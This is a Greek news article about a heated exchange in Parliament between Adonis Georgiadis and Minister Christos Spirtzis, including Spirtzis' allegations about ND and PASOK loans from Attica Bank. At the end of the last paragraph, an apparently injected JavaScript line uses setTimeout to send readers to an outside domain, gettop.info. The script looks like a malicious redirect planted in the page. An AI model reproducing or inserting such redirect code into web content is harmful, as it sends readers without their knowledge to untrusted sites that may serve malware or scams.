«Άναψαν» και πάλι τα αίματα στη Βουλή ανάμεσα σε Σπίρτζη και Άδωνι

0
9

 

Σε συνέχεια της επίθεσης που εξαπέλυσε χθες στη Βουλή ο αντιπρόεδρος της Νέας Δημοκρατίας Άδωνις Γεωργιάδης εναντίον του υπουργού υποδομών Χρήστου Σπίρτζη, τον οποίο χαρακτήρισε λαμόγιο και αρχιλαμόγιο, επανήλθε σήμερα και παρόντος του υπουργού τον χαρακτήρισε «αξιοθρήνητο».

Ξεκίνησε μάλιστα την επίθεση προς την πλευρά του ΣΥΡΙΖΑ λέγοντας πως «ο Λαφαζάνης και η Ζωή Κωνσταντοπούλου ήταν ιδεολόγοι«.

Ο Άδωνις Γεωργιάδης μάλιστα “συνέστησε” στον υπουργό Υποδομών να μην απευθύνει κατηγορίες από εδώ και πέρα στο ΠΑΣΟΚ. «Μην σας ακούσω να ξανακατηγορήσετε το ΠΑΣΟΚ. Είστε πιο ΠΑΣΟΚ από το βαθύ ΠΑΣΟΚ»,είπε προς τον Χρήστο Σπίρτζη.

Παίρνοντας τον λόγο ο υπουργός Υποδομών απάντησε αρχικά στους χθεσινούς χαρακτηρισμούς λέγοντας πως «εμείς δεν ξέρουμε για τη διαβάθμιση των λαμογιών. Όποιος έχει ασχοληθεί μπορεί να λέει«, ενώ για το… πόσο ΠΑΣΟΚ είναι, που του απέδωσε ο αντιπρόεδρος της ΝΔ τόνισε χαρακτηριστικά πως «το ΠΑΣΟΚ του σήμερα της δεξιάς και του νεοφιλελευθερισμού δεν έχει καμία σχέση με το παλιό ΠΑΣΟΚ«.
Ο Χρήστος Σπίρτζης υποστήριξε πως οι επιθέσεις που δέχεται από τη ΝΔ και το ΠΑΣΟΚ οφείλονται στο γεγονός πως τα δυο κόμματα φοβούνται πως θα υπάρξει καταγγελία των δανείων τους από την Τράπεζα Αττικής.
«Φωνάξτε αλλά πληρώστε και κάνα φράγκο» είπε χαρακτηριστικά.

Ο υπουργός Υποδομών σημείωσε ακόμα πως στελέχη που πρόσκεινται στη ΝΔ και το ΠΑΣΟΚ βρίσκονται γύρω από πολλές αποφάσεις για την Τράπεζα Αττικής, κατονομάζοντας συνεργάτες του Χρήστου Σταϊκούρα και του Ευάγγελου Βενιζέλου. Δεν παρέλειψε μάλιστα να βάλει στο «κάδρο» και τον Διοικητή της Τράπεζας της Ελλάδας Γιάννη Στουρνάρα υποστηρίζοντας πως όταν ο κεντρικός τραπεζίτης «ήταν υπουργός Οικονομικών πίεζε για να πουληθεί η Τράπεζα Αττικής σε ιδιώτες για ένα κομμάτι ψωμί«. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here